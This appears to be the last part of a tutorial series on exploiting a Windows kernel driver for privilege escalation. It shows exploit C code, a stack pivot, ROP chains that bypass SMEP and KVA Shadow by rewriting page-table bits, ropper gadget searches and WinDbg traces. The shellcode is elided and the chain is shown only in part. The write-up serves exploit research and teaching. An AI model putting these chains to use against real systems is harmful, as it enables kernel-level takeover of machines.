In the previous part of the series we successfully confirmed the vulnerabilities we discovered in our target kernel driver by proving that we can leak the base address of ntoskrnl.exe and hijack the execution flow to an arbitrary location of our choice.
In this final part, we will craft a full exploit that allows us to enable all privileges on Windows.
Now that we’ve confirmed both vulnerabilities, we can start crafting an exploit. The first step in this phase is to look for research papers or blog posts showing how to exploit this type of vulnerability. After a bit of googling I found an interesting presentation showing how to exploit such a vulnerability, along with what seems to be the related exploit code.
The general idea of the research is the following:
- Redirect the execution flow to a ROP gadget that performs stack pivoting. In short, stack pivoting means modifying the stack pointer (RSP) so that it points to a user-mode address X that we control.
- Execute a ROP chain stored at address X that obtains LPE.
- Restore execution.
The exploit shown here won’t work when HVCI is enabled.
Crafting the ROP chain
In order to retrieve gadgets from ntoskrnl.exe I’ve decided to use ropper. A very handy feature of ropper is being able to find specific gadgets based on a syntax similar to “regex”.
Let’s first look for our pivot gadget. We must find a gadget that loads into RSP a value that is below the maximum user-mode address and is a multiple of 8, meaning the last 3 bits of the address must be 0. Based on the research we are referencing, we can also use gadgets that load a value into ESP, since writing a 32-bit register sets the upper 4 bytes of RSP to 0:
$ python Ropper.py (ropper)> file /mnt/c/DRIVERS/windows11_ntoskrnl.exe [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] File loaded. (windows11_ntoskrnl.exe/PE/x86_64)> search mov rsp, % [INFO] Searching for gadgets: mov rsp, % [INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe 0x00000001404126d8: mov rsp, qword ptr [rcx + 0x10]; jmp rdx; [...] 0x00000001404200df: mov rsp, rbp; pop rbp; ret; (windows11_ntoskrnl.exe/PE/x86_64)> search mov esp, % [INFO] Searching for gadgets: mov esp, % [INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe [...] 0x0000000140b3a980: mov esp, 0xf6000000; ret; [...] 0x000000014040ac03: mov esp, ebx; ret; [...] (windows11_ntoskrnl.exe/PE/x86_64)>
We found two interesting gadgets. Recall that we can control the value of RBX so we control EBX. Let’s inspect the gadgets in WinDbg:
0: kd> uu nt+0x0b3a980
nt!MxCreatePfn+0x94:
fffff800`2653a980 c22041          ret     4120h
fffff800`2653a983 83c104          add     ecx,4
fffff800`2653a986 443bc9          cmp     r9d,ecx
fffff800`2653a989 72b6            jb      nt!MxCreatePfn+0x55 (fffff800`2653a941)
fffff800`2653a98b 89bb00010000    mov     dword ptr [rbx+100h],edi
fffff800`2653a991 443bce          cmp     r9d,esi
fffff800`2653a994 0f82ac620100    jb      nt!MiAssignTopLevelRanges+0x12a (fffff800`26550c46)
fffff800`2653a99a 488b6c2428      mov     rbp,qword ptr [rsp+28h]
0: kd> uu nt+0x040ac03
nt!SymCryptScsTableLoad128Xmm+0x187:
fffff800`25e0ac03 8be3            mov     esp,ebx
fffff800`25e0ac05 c3              ret
[...]
0: kd>
The first one (mov esp, 0xf6000000; ret;) actually disassembles as ret 4120h in WinDbg. The second one, on the other hand, matches what we see in WinDbg, so we choose it. We observed previously that rbx corresponds to object+0x30. So when allocating object we just need to call VirtualAlloc() specifying the address that we want in the first parameter.
At this point you can overwrite the function pointer again, this time with the address of our stack pivot gadget, set the breakpoints, re-launch the exploit and notice how RSP changes. Below is the modified arbitraryCallDriver() function.
For the moment the shellcode could be a dummy shellcode made of dummy instructions such as NOPs (\x90) or whatever you want.
char shellcode[] = "\x48\x89[...]\xC3"; [...] BOOL arbitraryCallDriver(PVOID outputBuffer, SIZE_T outSize) { char* inputBuffer = (char*)VirtualAlloc( NULL, 21, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); char* object = (char*)VirtualAlloc( (LPVOID)(0x0000001afeffe000), 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); printf("[+] object = 0x%p\n", object); object = (char*)(0x1aff000000 - 0x30); printf("[+] second object = 0x%p\n", object); PDEVICE_OBJECT ptr = (PDEVICE_OBJECT)(object + 0x30); memset(object, 0x41, 0x30); printf("[+] ptr = 0x%p\n", ptr); char* object2 = (char*)VirtualAlloc( NULL, SIZE_BUF, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); printf("[+] object2 = 0x%p\n", object2); //0x0000001af5ff0000 memset(object2, 0x43, 0x30); char* driverObject = (char*)VirtualAlloc( NULL, SIZE_BUF, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memset(driverObject, 0x50, SIZE_BUF); printf("[+] driverObject = 0x%p\n", driverObject); char* ptrDriver = driverObject + 0x30; char* pDriverFunction = ptrDriver + 0x1b*8+0x70; *((PDWORD64)pDriverFunction) = g_ntbase+ 0x40ac03; //mov esp, ebx; ret ptr->AttachedDevice = (PDEVICE_OBJECT)(object2 + 0x30); memset(ptr->AttachedDevice, 0x42, SIZE_BUF-0x40); //*((DWORD*)ptr->AttachedDevice) = 0xf6000000; printf("[+] ptr->AttachedDevice = 0x%p\n", ptr->AttachedDevice); PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000feffe000, 0x12000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (fake_stack == 0) { printf("[-] VirtualAlloc failed with error: %d\n", GetLastError()); exit(0); } printf("[*] fake_stack = 0x%p\n", fake_stack); PULONGLONG ropStack = (PULONGLONG)fake_stack + 0x2000; memset(fake_stack, 0x41, 0x12000); printf("[*] ropStack = 0x%p\n", ropStack); DWORD index = 0; char* scbase = (char*)VirtualAlloc((LPVOID)0x1a1a1a000000, 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!VirtualLock(scbase, 0x5000)) { printf("[-] virtualLock failed with error: %d\n", 
GetLastError()); exit(0); } memset(scbase, 0x42, 0x5000); char* sc = scbase + 0x3500; memcpy(sc, shellcode, sizeof(shellcode)); printf("[*] sc = 0x%p\n", sc); //TODO: beginning of rop chain at ropStack #ifdef _DEBUG for (int i = 0; i < index; i++) { printf("ropStack[%d] %p : 0x%p\n", i, &ropStack[i], ropStack[i]); } #endif ptr->AttachedDevice->DriverObject = (_DRIVER_OBJECT*)ptrDriver; ptr->AttachedDevice->AttachedDevice = 0; char* ptr2 = inputBuffer; *(ptr2) = 0; ptr2 += 1; *((PDWORD64)ptr2) = (DWORD64)ptr; printf("[+] User buffer allocated: 0x%8p\n", inputBuffer); DWORD bytesRet = 0; getchar(); BOOL res = DeviceIoControl( g_device, IOCTL_ARBITRARYCALLDRIVER, inputBuffer, SIZE_BUF, outputBuffer, outSize, &bytesRet, NULL ); printf("[*] sent IOCTL_ARBITRARYCALLDRIVER \n"); if (!res) { printf("[-] DeviceIoControl failed with error: %d\n", GetLastError()); } return res; } [...]
The idea of the code above is to allocate object so that it points at address 0x0000001afeffffd0. This way our first rogue _DEVICE_OBJECT (ptr in the code) will be located at address object+0x30 = 0x0000001aff000000.
When reaching the jmp rax instruction, RBX will contain the value 0x0000001aff000000, that is object+0x30. This means that when we execute our stack pivoting gadget mov esp, ebx; ret, RSP will be loaded with the value 0x00000000ff000000.
And in fact our ropStack variable points exactly at address 0x00000000ff000000. So we are left with filling the memory referenced by ropStack with a ROP chain that bypasses SMEP and finally redirects execution to our shellcode.
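The address arithmetic described above can be double-checked with a small portable sketch. The helper names (round_down_to_granularity, pivot_rsp, rop_stack_address, is_usable_user_stack, check_pivot_layout) are hypothetical and not part of the exploit. The sketch also assumes the usual 64 KiB allocation granularity, which would explain why requesting 0xfeffe000 yields a region starting at 0xfeff0000, and it assumes 0x00007FFFFFFEFFFF as the highest user-mode address.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: VirtualAlloc() rounds a requested base down to 64 KiB. */
#define ALLOC_GRANULARITY 0x10000ULL
/* Assumption: highest user-mode address on x64 Windows. */
#define MAX_USER_ADDRESS 0x00007FFFFFFEFFFFULL

uint64_t round_down_to_granularity(uint64_t requested) {
    return requested & ~(ALLOC_GRANULARITY - 1);
}

/* mov esp, ebx: a 32-bit register write zeroes the upper half of RSP. */
uint64_t pivot_rsp(uint64_t rbx) {
    return (uint64_t)(uint32_t)rbx;
}

/* ropStack = (PULONGLONG)fake_stack + 0x2000, i.e. 0x2000 eight-byte slots. */
uint64_t rop_stack_address(uint64_t requested_base) {
    return round_down_to_granularity(requested_base)
         + 0x2000 * sizeof(uint64_t);
}

/* The pivot target must be non-null, 8-byte aligned and in user space. */
int is_usable_user_stack(uint64_t rsp) {
    return rsp != 0 && (rsp & 7) == 0 && rsp <= MAX_USER_ADDRESS;
}

/* Re-derives the values quoted in the text from the constants in the code. */
void check_pivot_layout(void) {
    uint64_t object = 0x1aff000000ULL - 0x30;    /* as in the exploit code */
    uint64_t rbx = object + 0x30;                /* value in RBX at jmp rax */
    uint64_t rsp = pivot_rsp(rbx);

    assert(object == 0x0000001afeffffd0ULL);
    assert(rsp == 0x00000000ff000000ULL);
    assert(rsp == rop_stack_address(0x00000000feffe000ULL));
    assert(is_usable_user_stack(rsp));
}
```

Calling check_pivot_layout() passes silently when the numbers line up, which is a cheap way to re-validate the layout after changing any of the hardcoded addresses.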
Here I provided a diagram that hopefully summarizes the different data structures in user-space memory with their addresses:
First SMEP bypass ROP Chain
Now we can start crafting our ROP chain in order to bypass SMEP. Initially I crafted the following ROP chain (g_ntbase holds the base address of ntoskrnl.exe; recall that we can retrieve it by exploiting the arbitrary MSR read).
//<call MiGetPteAddress in order to get PTE. PTE address returned in rax>
ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret;
ropStack[index] = (ULONGLONG)(scbase+0x3000); index++; // shellcode address pte
ropStack[index] = g_ntbase + 0x203beb; index++; // pop rax; ret;
ropStack[index] = g_ntbase + 0x2abae4; index++; //address of nt!MiGetPteAddress
ropStack[index] = g_ntbase + 0x2803b8; index++; // jmp rax;
// <call MiGetPteAddress in order to get PTE. PTE address returned in rax>
// <Flip U=S bit> PTE VA already in rax
ropStack[index] = g_ntbase + 0x20FA62; index++; // pop rcx; ret;
ropStack[index] = 0x0000000000000063; index++; // DIRTY + ACCESSED + R/W + PRESENT
ropStack[index] = g_ntbase + 0x4531f1; index++; // mov byte ptr[rax], cl; ret;
ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret;
// </Flip U=S bit>
// <shellcode>
ropStack[index] = (ULONGLONG)sc; index++; // Shellcode address
// <shellcode>
The ROP chain above does the following:
- Call nt!MiGetPteAddress, passing as input the address of our shellcode (we will think about the shellcode itself later), in order to retrieve the address of the corresponding PTE. The result is returned in RAX.
- Set the DIRTY, ACCESSED, R/W and PRESENT bits of the PTE to 1 and its OWNER bit to 0.
- Execute the wbinvd instruction in order to write back and invalidate the CPU caches, so that the modified PTE is actually written back before the shellcode runs.
- Execute the shellcode.
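To make the first two steps concrete, here is a minimal user-mode sketch of the arithmetic involved. The function names are hypothetical. The PTE base 0xFFFFFE8000000000 is not given anywhere in this post: it is inferred from the !pte output shown further down (the real value is randomized per boot and is what the chain reads from the kernel), and the "before" PTE value ending in 867 is an assumed example with the user bit still set.

```c
#include <assert.h>
#include <stdint.h>

/* Bit positions in an x64 page table entry. */
#define PTE_PRESENT  (1ULL << 0)
#define PTE_WRITE    (1ULL << 1)
#define PTE_USER     (1ULL << 2)   /* the OWNER bit: 1 = user, 0 = supervisor */
#define PTE_ACCESSED (1ULL << 5)
#define PTE_DIRTY    (1ULL << 6)

/* The arithmetic usually attributed to nt!MiGetPteAddress. */
uint64_t pte_address(uint64_t va, uint64_t pte_base) {
    return ((va >> 9) & 0x7FFFFFFFF8ULL) + pte_base;
}

/* mov byte ptr [rax], cl: only the low byte of the PTE is replaced. */
uint64_t write_low_byte(uint64_t pte, uint8_t value) {
    return (pte & ~0xFFULL) | value;
}

void check_first_chain(void) {
    /* Assumption: PTE base inferred from the !pte output in this post. */
    const uint64_t pte_base = 0xFFFFFE8000000000ULL;

    /* Shellcode VA -> PTE VA, matching "PTE at FFFFFE8D0D0D0018". */
    assert(pte_address(0x00001a1a1a003500ULL, pte_base)
           == 0xFFFFFE8D0D0D0018ULL);

    /* 0x63 sets DIRTY, ACCESSED, R/W and PRESENT and leaves OWNER at 0. */
    assert(0x63 == (PTE_DIRTY | PTE_ACCESSED | PTE_WRITE | PTE_PRESENT));
    assert((0x63 & PTE_USER) == 0);

    /* Assumed "before" value (user page) turned into a supervisor page. */
    assert(write_low_byte(0x08000001BCC7A867ULL, 0x63)
           == 0x08000001BCC7A863ULL);
}
```

Writing a single byte is enough here because all the flags the chain cares about live in the low byte of the entry; the page frame number in the upper bits stays untouched.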
So now we can just recompile the exploit, set a breakpoint at the first gadget of our ROP chain and launch it (at this point I think it’s unnecessary to use the IDA Pro Debugger so I suggest switching to WinDbg). You can see the breakpoint gets hit:
0: kd> ba e 1 nt+0x2053e5 0: kd> g Breakpoint 0 hit nt!KeRemoveQueueDpcEx+0x125: fffff800`25c053e5 59 pop rcx 0: kd> r rax=fffff80025e0ac03 rbx=0000001aff000000 rcx=000001f6a94d0030 rdx=ffffe18f37ad8000 rsi=ffffe18f365aa00d rdi=000001f6a94d0030 rip=fffff80025c053e5 rsp=00000000ff000008 rbp=0000000000000000 r8=000000000000001b r9=000001f6a94d0030 r10=fffff80025e0ac03 r11=0000000000000000 r12=0000000000000004 r13=ffffe18f35dfa4c0 r14=ffffe18f35dfa3f0 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246 nt!KeRemoveQueueDpcEx+0x125: fffff800`25c053e5 59 pop rcx 0: kd> p KDTARGET: Refreshing KD connection *** Fatal System Error: 0x0000000a (0x00000000FEFFF319,0x00000000000000FF,0x00000000000000F6,0xFFFFF80025E18BE0) [...] 0: kd> !analyze -v [...] IRQL_NOT_LESS_OR_EQUAL (a) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If a kernel debugger is available get the stack backtrace. Arguments: Arg1: 00000000fefff319, memory referenced Arg2: 00000000000000ff, IRQL Arg3: 00000000000000f6, bitfield : bit 0 : value 0 = read operation, 1 = write operation bit 3 : value 0 = not an execute operation, 1 = execute operation (only on chips which support this level of status) Arg4: fffff80025e18be0, address which referenced memory Debugging Details: ------------------ [...] BUGCHECK_CODE: a BUGCHECK_P1: fefff319 BUGCHECK_P2: ff BUGCHECK_P3: f6 BUGCHECK_P4: fffff80025e18be0 [...] A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. 
0: kd> k # Child-SP RetAddr Call Site 00 fffff800`28a944c8 fffff800`25f668e2 nt!DbgBreakPointWithStatus 01 fffff800`28a944d0 fffff800`25f65fa3 nt!KiBugCheckDebugBreak+0x12 02 fffff800`28a94530 fffff800`25e16c07 nt!KeBugCheck2+0xba3 03 fffff800`28a94ca0 fffff800`25e2c4e9 nt!KeBugCheckEx+0x107 04 fffff800`28a94ce0 fffff800`25e27a34 nt!KiBugCheckDispatch+0x69 05 fffff800`28a94e20 fffff800`25e18be0 nt!KiPageFault+0x474 06 fffff800`28a94fb0 fffff800`25e19567 nt!KiInterruptSubDispatchNoLockNoEtw+0x20 07 00000000`fefff2f0 fffff800`25d1375f nt!KiInterruptDispatchNoLockNoEtw+0x37 08 00000000`fefff480 fffff800`264ae2a6 nt!KeThawExecution+0xef 09 00000000`fefff4b0 fffff800`25d0b38a nt!KdExitDebugger+0xc2 0a 00000000`fefff4e0 fffff800`264ae117 nt!KdpReport+0x136 0b 00000000`fefff520 fffff800`25d0a93e nt!KdpTrap+0x37 0c 00000000`fefff570 fffff800`25d0981f nt!KdTrap+0x22 0d 00000000`fefff5b0 fffff800`25e2c63c nt!KiDispatchException+0x19f 0e 00000000`fefffc90 fffff800`25e24423 nt!KiExceptionDispatch+0x13c 0f 00000000`fefffe70 fffff800`25c053e5 nt!KxDebugTrapOrFault+0x423 10 00000000`ff000008 fffff800`25c03beb nt!KeRemoveQueueDpcEx+0x125 11 00000000`ff000018 00001a1a`1a003500 nt!CmSiMapViewOfSection+0x57 12 00000000`ff000078 41414141`41414141 0x00001a1a`1a003500 13 00000000`ff000080 41414141`41414141 0x41414141`41414141 14 00000000`ff000088 41414141`41414141 0x41414141`41414141 15 00000000`ff000090 41414141`41414141 0x41414141`41414141 [...]
You can see an error occurred when trying to dereference memory at address 0x00000000fefff319, close to our ropStack. I thought it might be due to a page fault (as you can read from WinDbg), so I tried modifying the code as follows:
[...]
if (!VirtualLock((char*)ropStack - 0x3000, 0x10000)) {
    printf("[-] virtualLock failed with error: %d\n", GetLastError());
    exit(0);
}
[...]
The idea is to call VirtualLock() on the pages containing our ROP chain and also on the adjacent pages. Based on MSDN, this Win32 API is supposed to lock the pages in physical memory and should therefore avoid page faults. However, I wasn’t able to solve the issue.
On the other hand, while analyzing the stack trace I noticed a couple of functions such as nt!KdTrap and nt!KdExitDebugger, so I thought the issue might be stepping with the debugger. In fact, if you set a breakpoint on, for example, the fifth ROP gadget, you will notice the breakpoint gets hit, confirming the ROP gadgets are actually executed successfully!
So, it looks like we just can’t debug our ROP chain but we can execute it 😅
If we set a breakpoint directly on the first instruction of our shellcode we can see the breakpoint gets hit. At this point we can also notice the owner bit of the shellcode’s PTE is set to 0 (supervisor mode), confirming the ROP chain was successful:
0: kd> !process 0 0 DrvExpTemplate.exe PROCESS ffffe18f36e9e0c0 SessionId: 1 Cid: 06f0 Peb: ae8969f000 ParentCid: 0720 DirBase: 119fd2002 ObjectTable: ffff9602fa50b4c0 HandleCount: 51. Image: DrvExpTemplate.exe 0: kd> .process /r /p /i ffffe18f36e9e0c0 You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 0: kd> g Break instruction exception - code 80000003 (first chance) nt!DbgBreakPointWithStatus: fffff800`25e20ca0 cc int 3 1: kd> dx @$curprocess.Name @$curprocess.Name : DrvExpTemplate.exe Length : 0x12 1: kd> ba e 1 0x00001a1a1a003500 1: kd> g ... Retry sending the same data packet for 64 times. The transport connection between host kernel debugger and target Windows seems lost. please try resync with target, recycle the host debugger, or reboot the target Windows. Breakpoint 0 hit 00001a1a`1a003500 4889c2 mov rdx,rax 0: kd> !pte 0x00001a1a1a003500 VA 00001a1a1a003500 PXE at FFFFFEFF7FBFD1A0 PPE at FFFFFEFF7FA34340 PDE at FFFFFEFF46868680 PTE at FFFFFE8D0D0D0018 contains 8A00000222774867 contains 0A00000129075867 contains 0A000001BBD76867 contains 08000001BCC7A863 pfn 222774 ---DA--UW-V pfn 129075 ---DA--UWEV pfn 1bbd76 ---DA--UWEV pfn 1bcc7a ---DA--KWEV
Now, let’s try to set a breakpoint at the second instruction in the shellcode and see if we hit it:
0: kd> !process 0 0 DrvExpTemplate.exe PROCESS ffffe18f3578e0c0 SessionId: 1 Cid: 0c08 Peb: ede7a83000 ParentCid: 0720 DirBase: 1b7fd5002 ObjectTable: ffff9602ff106c40 HandleCount: 51. Image: DrvExpTemplate.exe 0: kd> .process /r /i /p ffffe18f3578e0c0 You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 0: kd> g Break instruction exception - code 80000003 (first chance) nt!DbgBreakPointWithStatus: fffff800`25e20ca0 cc int 3 1: kd> dx @$curprocess.Name @$curprocess.Name : DrvExpTemplate.exe Length : 0x12 1: kd> uu 00001a1a`1a003500 L3 00001a1a`1a003500 4889c2 mov rdx,rax 00001a1a`1a003503 488b08 mov rcx,qword ptr [rax] 00001a1a`1a003506 480fbae902 bts rcx,2 1: kd> ba e 1 00001a1a`1a003503 1: kd>
We launch the exploit again and the VM just restarts.
Kernel Virtual Address Shadow
The issue with our SMEP bypass strategy is that it is only suitable for versions of Windows 10 released before March 2018. After that, Microsoft introduced Kernel Virtual Address Shadow, a protection technique for mitigating the Meltdown vulnerability, which also has the secondary effect of preventing kernel-mode execution of user-mode code.
This article was definitely helpful in understanding Kernel Virtual Address Shadow and how to bypass it.
Referring to the article, it is possible to detect if KVA is enabled by checking the PML4 entry (PML4E) of our shellcode’s address. In fact we already did it in WinDbg:
0: kd> !pte 0x00001a1a1a003500 VA 00001a1a1a003500 PXE at FFFFFEFF7FBFD1A0 PPE at FFFFFEFF7FA34340 PDE at FFFFFEFF46868680 PTE at FFFFFE8D0D0D0018 contains 8A00000222774867 contains 0A00000129075867 contains 0A000001BBD76867 contains 08000001BCC7A863 pfn 222774 ---DA--UW-V pfn 129075 ---DA--UWEV pfn 1bbd76 ---DA--UWEV pfn 1bcc7a ---DA--KWEV
We can see the flags of our PML4 entry (known as PX entry or PXE in Windows) are ---DA--UW-V. So it’s not executable (the E flag doesn’t appear in WinDbg), as explained in the article.
According to the article, the strategy for bypassing KVA and SMEP is the following:
- Retrieve the PML4E’s address.
- Set the bit at index 63 (NX bit) and the bit at index 2 (Owner bit) of the PML4E to 0, in order to make the PML4E both executable and owned by supervisor mode (on x64, a PML4E is a 64-bit value with bit indexes going from 0 to 63).
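The check and the fix listed above boil down to two bit tests and one mask. The sketch below uses hypothetical helper names and takes the PXE value 8A00000222774867 from the !pte output above as its sample input.

```c
#include <assert.h>
#include <stdint.h>

#define ENTRY_USER (1ULL << 2)    /* Owner bit: 1 = user, 0 = supervisor */
#define ENTRY_NX   (1ULL << 63)   /* No-execute bit */

/* WinDbg shows the E flag only when the NX bit is clear. */
int entry_is_executable(uint64_t entry) {
    return (entry & ENTRY_NX) == 0;
}

/* WinDbg shows K instead of U when the Owner bit is clear. */
int entry_is_supervisor(uint64_t entry) {
    return (entry & ENTRY_USER) == 0;
}

/* Clears bit 63 and bit 2, leaving every other bit untouched. */
uint64_t make_supervisor_executable(uint64_t entry) {
    return entry & ~(ENTRY_NX | ENTRY_USER);
}

void check_pml4e_patch(void) {
    const uint64_t before = 0x8A00000222774867ULL;  /* ---DA--UW-V */
    const uint64_t after = make_supervisor_executable(before);

    assert(!entry_is_executable(before) && !entry_is_supervisor(before));
    assert(entry_is_executable(after) && entry_is_supervisor(after));
    assert(after == 0x0A00000222774863ULL);
}
```

The expected result has the same shape as a supervisor, executable entry in WinDbg notation (---DA--KWEV): the leading 8 becomes 0 and the trailing 7 becomes 3.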
A note on SMEP bypass using the CR4 register technique
At this point it would be probably easier to disable SMEP by just using the technique that clears the bit at index 20 of the CR4 register.
However, I didn’t like the idea of possibly triggering PatchGuard. In addition, using ropper I couldn’t find “nice gadgets” that allow modifying the CR4 register.
Here’s the output of ropper looking for gadgets that save the CR4 register in another one:
(windows11_ntoskrnl.exe/PE/x86_64)> search % %, cr4 [INFO] Searching for gadgets: % %, cr4 [INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe 0x0000000140b14519: add dword ptr [rbp - 0xf], esi; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x0000000140b1451a: jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x000000014042815d: mov r9, cr4; mov r8, cr0; mov ecx, 0x7f; call 0x42c480; nop; ret; 0x0000000140b1451c: mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x000000014042815e: mov rcx, cr4; mov r8, cr0; mov ecx, 0x7f; call 0x42c480; nop; ret; 0x0000000140b14517: sub eax, 1; jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x0000000140b14516: sub r8, 1; jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; 0x0000000140b1451b: int1; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; (windows11_ntoskrnl.exe/PE/x86_64)> search % cr4 [INFO] Searching for gadgets: % cr4 [...] 0x0000000140b1451b: int1; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret; (windows11_ntoskrnl.exe/PE/x86_64)>
As you can see, we have some gadgets that are followed by a call to a fixed location (that I would avoid).
The most promising gadget in my opinion was 0x0000000140b1451c: mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;. However, you can see it ends up setting bit 6 (0x40) of the CR4 register, which again may trigger PatchGuard or other unwelcome behavior.
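As a rough illustration of the two CR4 operations discussed in this section, the sketch below models them on a plain integer. The function names and the sample CR4 value 0x350ef8 are hypothetical; the bit positions (bit 6 = MCE, bit 20 = SMEP) follow the architectural layout of CR4.

```c
#include <assert.h>
#include <stdint.h>

#define CR4_MCE  (1ULL << 6)    /* 0x40, the bit set by the gadget */
#define CR4_SMEP (1ULL << 20)   /* the bit the classic technique clears */

/* What the classic SMEP bypass wants to write back to CR4. */
uint64_t cr4_clear_smep(uint64_t cr4) {
    return cr4 & ~CR4_SMEP;
}

/* Effect of "mov rax, cr4; or rax, 0x40; mov cr4, rax; ret". */
uint64_t cr4_after_gadget(uint64_t cr4) {
    return cr4 | 0x40;
}

void check_cr4_model(void) {
    const uint64_t sample = 0x350ef8ULL;   /* hypothetical CR4 value */

    assert(cr4_clear_smep(sample) == 0x250ef8ULL);
    /* The gadget only touches bit 6, so SMEP stays enabled. */
    assert((cr4_after_gadget(sample) & CR4_SMEP) != 0);
    assert((cr4_after_gadget(0) & CR4_MCE) != 0);
}
```

In this model the gadget taken as a whole never clears bit 20, which is one more reason it is not a drop-in replacement for a clean write to CR4.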
KVA/SMEP bypass ROP chain
The first thing to do in crafting this second ROP chain is retrieving the address of the PML4 entry.
Based on the article, the function for retrieving the PML4E address is CalculatePml4VirtualAddress(), and it requires two indexes:
- pml4SelfRefIndex: calculated through ExtractPml4Index(), passing as input the pteAddress that is located at nt!MiGetPteAddress+0x13.
- pml4Index: calculated again through ExtractPml4Index(), but passing as input the address of the shellcode.
The pml4Index can be easily calculated from user-mode, out of the ROP chain, as we already know the address of the shellcode:
[...]
unsigned int ExtractPml4Index(PVOID address) {
    return ((uintptr_t)address >> 39) & 0x1ff;
}
[...]
BOOL arbitraryCallDriver(PVOID outputBuffer, SIZE_T outSize) {
    [...]
    memset(scbase, 0x42, 0x5000);
    char* sc = scbase + 0x3500;
    memcpy(sc, shellcode, sizeof(shellcode));
    unsigned int pml4shellcode_index = ExtractPml4Index(sc);
    printf("[*] sc = 0x%p\n", sc);
    // %x rather than %p: pml4shellcode_index is an unsigned int, not a pointer
    printf("[*] pml4shellcode_index 0x%x\n", pml4shellcode_index);
    //start of ROP chain
}
On the other hand, the pml4SelfRefIndex must be calculated inside our ROP chain, as we must start from the address stored at nt!MiGetPteAddress+0x13.
So first we read the address at nt!MiGetPteAddress+0x13 and store the result in rax:
//<get base from nt!MiGetPteAddress+0x13>
ropStack[index] = g_ntbase + 0x203beb; index++; // pop rax; ret;
ropStack[index] = g_ntbase + 0x2abaf7; index++; // address of nt!MiGetPteAddress+0x13
ropStack[index] = g_ntbase + 0x235aa6; index++; // mov rax, qword ptr [rax]; ret;
//<get base from nt!MiGetPteAddress+0x13>
Then we calculate the pml4SelfRefIndex from the address previously stored in rax. This is like re-implementing ExtractPml4Index() with ROP gadgets: we basically have to shift rax right by 39 and then AND rax with the constant 0x1ff.
This is achieved with the ROP chain below, where we shift rax right by 0xc+0xc+0xc+3=0x27 (0x27 corresponds to 39). The calculated pml4SelfRefIndex is finally moved from rax to rcx.
//<get pml4Index>
ropStack[index] = g_ntbase + 0x34bb9c; index++; // pop rdx; ret;
ropStack[index] = 0x1ff; index++; // 0x1ff
ropStack[index] = g_ntbase + 0x752664; index++; // shr rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x752664; index++; // shr rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x752664; index++; // shr rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x38738b; index++; // shr rax, 3; ret;
ropStack[index] = g_ntbase + 0x358532; index++; // and rax, rdx; ret;
//<get pml4index> now pml4index in rax
//<move pml4index in rcx>
ropStack[index] = g_ntbase + 0x34bb9c; index++; // pop rdx; ret;
ropStack[index] = (ULONGLONG)&ropStack[index + 3]; index++; // address of the dummy slot below
ropStack[index] = g_ntbase + 0x35dbc9; index++; // mov qword ptr [rdx], rax; ret;
ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret;
ropStack[index] = 0x4141414141414141; index++; // dummy, overwritten with rax at run time
//<mov pml4index in rcx>
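The chain above can be modelled in plain C, one statement per gadget, to check that it computes the same value as ExtractPml4Index(). The function names are hypothetical, and the input 0xFFFFFE8000000000 is an assumed PTE base inferred from the !pte output in this post, not a value read from the kernel.

```c
#include <assert.h>
#include <stdint.h>

/* Direct form, equivalent to ExtractPml4Index(). */
uint64_t extract_pml4_index(uint64_t address) {
    return (address >> 39) & 0x1ff;
}

/* Gadget-by-gadget form of the <get pml4Index> part of the chain. */
uint64_t extract_pml4_index_gadgets(uint64_t rax) {
    uint64_t rdx = 0x1ff;   /* pop rdx; ret */
    rax >>= 0xc;            /* shr rax, 0xc; ret */
    rax >>= 0xc;            /* shr rax, 0xc; ret */
    rax >>= 0xc;            /* shr rax, 0xc; ret */
    rax >>= 3;              /* shr rax, 3; ret */
    rax &= rdx;             /* and rax, rdx; ret */
    return rax;
}

/* Model of the <move pml4index in rcx> trick: rax is written into the
   stack slot that a later "pop rcx" is going to consume. */
uint64_t move_rax_to_rcx(uint64_t rax) {
    uint64_t slot = 0x4141414141414141ULL;  /* dummy value in the chain */
    uint64_t *rdx = &slot;                  /* pop rdx; ret */
    *rdx = rax;                             /* mov qword ptr [rdx], rax; ret */
    uint64_t rcx = slot;                    /* pop rcx; ret */
    return rcx;
}

void check_self_ref_index(void) {
    const uint64_t pte_base = 0xFFFFFE8000000000ULL;  /* assumed value */

    assert(extract_pml4_index_gadgets(pte_base) == 0x1fd);
    assert(extract_pml4_index_gadgets(pte_base) == extract_pml4_index(pte_base));
    assert(move_rax_to_rcx(0x1fd) == 0x1fd);
}
```

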